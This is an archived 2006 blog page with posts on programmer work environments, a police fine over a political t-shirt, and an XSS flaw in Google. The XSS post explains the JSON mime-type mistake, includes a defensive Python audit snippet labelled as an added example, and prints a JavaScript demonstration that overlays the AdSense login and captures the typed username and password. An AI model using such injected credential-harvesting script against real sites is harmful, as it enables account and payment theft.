Archive for July, 2006

Programming flow, and why what works for you, doesn’t work for Mildred

Sunday, July 30th, 2006

The Joel production line appears to be claiming that every programmer can only work one way: in private, with no distractions, just churning away at a task.

It appears that Joel feels programmers have no artistic side where inspiration might be needed; he also appears to believe that every programmer has zen-like powers of concentration such that they can endlessly code without a single distraction.

Now it’s common that many programmers don’t like interruptions, but not all; I’ve met a few others, generally the best ones I’m working with - perhaps that’s because I recognise their quality because I interact more with them, or because a mind that perseveres in an environment where most people are not like you is related to being a better programmer - I don’t know. I could never work in a private office; I can work in a pub, or a cafe, or on the sofa with a TV for company and the distraction, but I cannot work in a private office, or a silent open-plan office.

What happens is there aren’t the distractions to trigger inspiration, or to slow down the thought so the code actually written is the code that is in the head. Of course even without noise, refreshing email, refreshing usenet, visiting bloglines, checking the lurking on IRC channels can be used as a distraction - but even with those, I often have to turn to spider solitaire to give the brain a break to solve the particular problem. Of course it may be even more productive to go for a jog, or a walk on the beach, but those aren’t things you can do if you’re having to work in an office - all you can do is walk to the coffee or around the office - if the office is all private rooms you can’t even do that, as you’ll never meet anyone.

Don’t make the mistake of assuming what works for you will work for everyone; people are very different creatures! One of the big problems I have in a closed environment is the length of time it takes to get to know people: can I call that bloke on the team a muppet when he makes mistakes, or do I have to tread on eggshells around him? Can I throw out an idea without people thinking me stupid and not listening next time? Everyone will always have stupid ideas, but if they don’t say them they might never say their good ones. I need to get to know the team: both them, and what they’re doing, and how they write code - are they someone who checks in regularly, so there’s no point reporting that bug to them, they’ll know about it and just wanted it checked in - or are they someone who checks in only when they think it’s finished, so the bug needs reporting.

Writing software, or creating websites, is a team activity; if everyone’s in a separate office where’s the team? Of course teams can work remotely, there’s no need for everyone to be in the same office - however they then do need an IRC channel or group chat where everyone can overhear the other conversations - and have off-topic conversations, otherwise the social interaction never builds up, and you can never learn to trust the other people.

Don’t serve JSON as text/html

Wednesday, July 5th, 2006

Another day, another XSS flaw, this one in Google again, but this is a little more interesting than the normal ones: what this one shows is how JSON results add an extra attack vector that might be missed by your QA team.

The problem here was that the JSON was returned with a mime-type of text/html; a browser will render that as if it was an HTML page, even if it’s really just a javascript snippet. The easiest way to protect against these is to ensure that all javascript received by the XMLHttpRequest object is returned with a suitable mime-type - application/json. That will mean even when you make a mistake and write un-encoded untrusted data to the document, it won’t allow people to attack your site.
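An added example (not code from the original post) of the defensive side of this: a response builder that sends JSON under the recommended application/json mime-type, and an audit check that flags captured responses whose JSON body is served as text/html. The function names and the sample responses are constructed for illustration.

```python
import json

# Added example, not code from the original post. Function names and the
# sample responses below are constructed for illustration.

def json_response(payload):
    """Build an HTTP response for an XMLHttpRequest caller: serialised JSON
    under the mime-type the post recommends, application/json, so a browser
    asked to show the URL directly will not render it as an HTML page."""
    body = json.dumps(payload).encode("utf-8")
    headers = {"Content-Type": "application/json; charset=utf-8"}
    return 200, headers, body

def media_type(headers):
    """Return the bare media type from a Content-Type header, case-insensitively."""
    for name, value in headers.items():
        if name.lower() == "content-type":
            return value.split(";")[0].strip().lower()
    return ""

def is_json_body(body):
    try:
        json.loads(body)
        return True
    except ValueError:  # JSONDecodeError and UnicodeDecodeError are ValueErrors
        return False

# Types a browser will happily render as markup; JSON under any of these
# turns an un-encoded untrusted value into live HTML.
RENDERABLE = {"text/html", "application/xhtml+xml", ""}

def audit_response(headers, body):
    """Return a list of findings for one captured response.
    Flags JSON bodies served as text/html (or with no Content-Type at all),
    which is exactly the mistake behind the flaw described in the post."""
    findings = []
    if is_json_body(body):
        mtype = media_type(headers)
        if mtype in RENDERABLE:
            findings.append("JSON body served as %s; send application/json instead"
                            % (mtype or "no Content-Type"))
    return findings

# Constructed sample: a search-style result that echoes an untrusted query.
UNTRUSTED = {"q": "<b>not escaped</b>", "hits": 3}
BAD_HEADERS = {"Content-Type": "text/html; charset=UTF-8"}

if __name__ == "__main__":
    status, headers, body = json_response(UNTRUSTED)
    print(status, headers, audit_response(headers, body))               # [] -> safe
    print(audit_response(BAD_HEADERS, json.dumps(UNTRUSTED).encode()))  # flagged
```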

The google exploit was reported here; at the time of writing it is unpatched, and unfortunately that was down to the discoverer not giving google any time to fix it. Whilst they have had their problems before, recently they have patched quickly, so this was not very fair, or wise. Google also appear to be taking testing their own services for security flaws more seriously; they recently had a presentation to the QA team that you can watch on Google Video.

As I’ve said before, having everything on a single domain causes problems: it means any exploit anywhere on the domain allows you to exploit any service provided for the domain. This exploit is also present on https:// google, so to reinforce the problem XSS can present to a user, and why XSS is not simply about cookie stealing, here’s a simple demonstration of using the exploit to steal the username and password from google adsense.

The exploit is simply used to create an IFRAME that fills the document and points it to a google adsense login; when the user logs in, the username and password are alerted - also after logging in, the “today’s earnings” are alerted. Of course a real attacker would not alert these fields, but would send them off to a site to be collected later. Are google adsense passwords useful? Would you notice if the address or account to get the cash changed until you’d not got the cheque?

The script code is simple; you don’t need to be clever, and phishers generally aren’t stupid, it takes brains to launder money.

document.body.innerHTML="<div><iframe src='https://www.google.com/adsense/report/overview'"+
" onload='go()' style='position:absolute;top:0;left:0;height:100%;width:100%;'></iframe></div>";

function go() {
  try {
    var win=window.frames[0];
    win.document.body.style.overflow="hidden";
    win.document.body.style.border="0px solid white";
    var doc=win.frames[0].document.forms[0];
    doc.onsubmit=function() {
      alert("Your adsense username and password are:\n"+
        doc["Email"].value+'\nand\n'+doc["Passwd"].value);
      x=window.open(location.href);
    }
  } catch (e) {
    try {
      var win=window.frames[0];
      var doc=win.document.body;
      var x="Today's Earnings:"+doc.getElementsByTagName('h1')[0];
      alert(x.getElementsByTagName('span')[0].innerHTML.replace(" ",""));
    } catch (e) {}
  }
}

The result is clear:

Bollocks To Blair

Saturday, July 1st, 2006

Bollocks is a lovely word, flexible and not offensive at all to the majority of the British public, yet the Norfolk police think it causes “harassment, alarm and distress” if you use it as “Bollocks to Blair”. It seems to me pretty clear that the Norfolk police don’t understand the law: the harassment, alarm and distress law that is punishable by an 80 pound fixed penalty notice is Section 5 of the Public Order Act 1986. The person is guilty of this offence if:

  • (b) displays any writing, sign or other visible representation which is threatening, abusive or insulting,

Now, I suppose that you could at a push say it was insulting, but I think it would be a struggle; it’s certainly not threatening or abusive, so I’m not sure it’s an offence at all. However, if it is there are two obvious defences applicable to the words “bollocks to blair” on a t-shirt,

  • (a) that he had no reason to believe that there was any person within hearing or sight who was likely to be caused harassment, alarm or distress, or
  • (c) that his conduct was reasonable.
  • (4) A person is guilty of an offence under section 5 only if he intends his words or behaviour, or the writing, sign or other visible representation, to be threatening, abusive or insulting, or is aware that it may be threatening, abusive or insulting or (as the case may be) he intends his behaviour to be or is aware that it may be disorderly.

Unfortunately this will never make it to court: when Tony Wright requests a court hearing, as is his right under the scheme, then “the case will be reviewed by a Crown Prosecutor, applying the evidential and public interest test under the Code for Crown Prosecutors.” [PND Op guidance], and unfortunately I’m sure they’ll decide it’s not in the public interest.

We need a court case; the police are wasting too much time on ludicrous things, making simple mistakes. It’s possible to understand, if not quite excuse, the police making a mistake when under real pressure and shooting innocent men - at least there was pressure - but what pressure is there on a policeman sitting in a Norfolk field faced with t-shirts saying “Bollocks to Blair”?

Bollocks has an interesting history in UK courts: in 1977 there was a case against a record store and Richard Branson over the Sex Pistols album http://en.wikipedia.org/wiki/Never_Mind_The_Bollocks_Here’s_The_Sex_Pistols. That case failed, probably thanks to the defence having a famous QC, Rumpole creator John Mortimer QC, to help in the defence of a minor crime at a magistrates court.

Mr. Mortimer managed to sum up in that case with the excellent

“What sort of country are we living in if a politician comes to Nottingham and speaks here to a group of people in the city centre and during his speech a heckler replies ‘bollocks’. Are we to expect this person to be incarcerated, or do we live in a country where we are proud of our Anglo Saxon language?”

[ref].

Unfortunately it’s looking increasingly like the Police do want such people to be incarcerated, and this time what famous QCs are there that Mr Wright could call on? Unfortunately I could only think of one, Cherie Booth QC, and I’m not sure she’d be up for it.